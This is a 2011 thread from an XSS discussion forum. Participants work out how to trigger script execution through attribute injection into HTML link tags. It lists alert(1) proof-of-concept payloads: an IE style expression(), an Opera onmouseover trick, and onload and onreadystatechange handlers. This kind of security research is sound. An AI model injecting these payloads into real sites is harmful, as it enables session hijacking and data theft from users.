Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
XSS in <link type="application/rss+xml">
Posted by: ethicalhack3r
Date: May 18, 2011 09:31AM

Hi,

I have come across the following XSS which I can't seem to get to execute. The injecting is within the 'title' element of the 'link' tag.

After some reading up, rel="alternative" with type="application/rss+xml", will take an action if the user agent is a 'rss+xml' application.

So, from my understanding the XSS would only execute if the page was accessed via such an application.

Here is the tag without injection:

<link rel="alternate" type="application/rss+xml" title="Search Results | News Feed" href="feeds/newsfeed.php" />

The tag with injection:

<link rel="alternate" type="application/rss+xml" title="tt" onmousemove="alert(1)" whatever=" Search Results | News Feed" href="feeds/newsfeed.php" />

The payload used:

tt" onmousemove="alert(1)" whatever="

Is there any way to get the above to execute injected javascript?

Thanks,
Ryan

Options: ReplyQuote
Re: XSS in <link type="application/rss+xml">
Posted by: Gareth Heyes
Date: May 18, 2011 10:20AM

"style="xss:expression(alert(1))"x="

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: XSS in <link type="application/rss+xml">
Posted by: ethicalhack3r
Date: May 18, 2011 12:02PM

Hi Gareth,

That payload doesn't execute in my FF4.

<link rel="alternate" type="application/rss+xml" title="" style="xss:expression(alert(1))" x=" Search Results | News Feed" href="feeds/newsfeed.php" />

Thanks for the reply,
Ryan

Options: ReplyQuote
Re: XSS in <link type="application/rss+xml">
Posted by: Anonymous User
Date: May 18, 2011 12:43PM

Expression is IE only (IE7 doc mode)

This works on Opera:
<link rel="alternate" type="application/rss+xml" title=""style="display:block;border:100px solid red"onmouseover=alert(1)// href="feeds/newsfeed.php" />

Options: ReplyQuote
Re: XSS in <link type="application/rss+xml">
Posted by: ethicalhack3r
Date: May 18, 2011 12:55PM

Ah! Thanks for the info mario!

That payload did execute correctly within Opera.

I thought that maybe the 'type' element value was stopping the XSS from being executed.

I will keep playing with FF4, see if I can come up with something.

Options: ReplyQuote
Re: XSS in <link type="application/rss+xml">
Posted by: Anonymous User
Date: May 18, 2011 01:05PM

If you find something in FF4+ it'd be beyond awesome ;)



Edited 1 time(s). Last edit at 05/18/2011 02:10PM by .mario.

Options: ReplyQuote
Re: XSS in <link type="application/rss+xml">
Posted by: Gareth Heyes
Date: May 18, 2011 01:26PM

This also works on IE9
<link onload=alert(1) href="http://hackvertor.co.uk/css/styles.css" rel="stylesheet" type="text/css" />

<link onreadystatechange=alert(1) href="http://hackvertor.co.uk/css/styles.css" rel="stylesheet" type="text/css" />

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: XSS in <link type="application/rss+xml">
Posted by: ethicalhack3r
Date: May 18, 2011 05:25PM

Just came across this old post which seems to discuss this same injection:
http://sla.ckers.org/forum/read.php?2,36227

Options: ReplyQuote


Sorry, only registered users may post in this forum.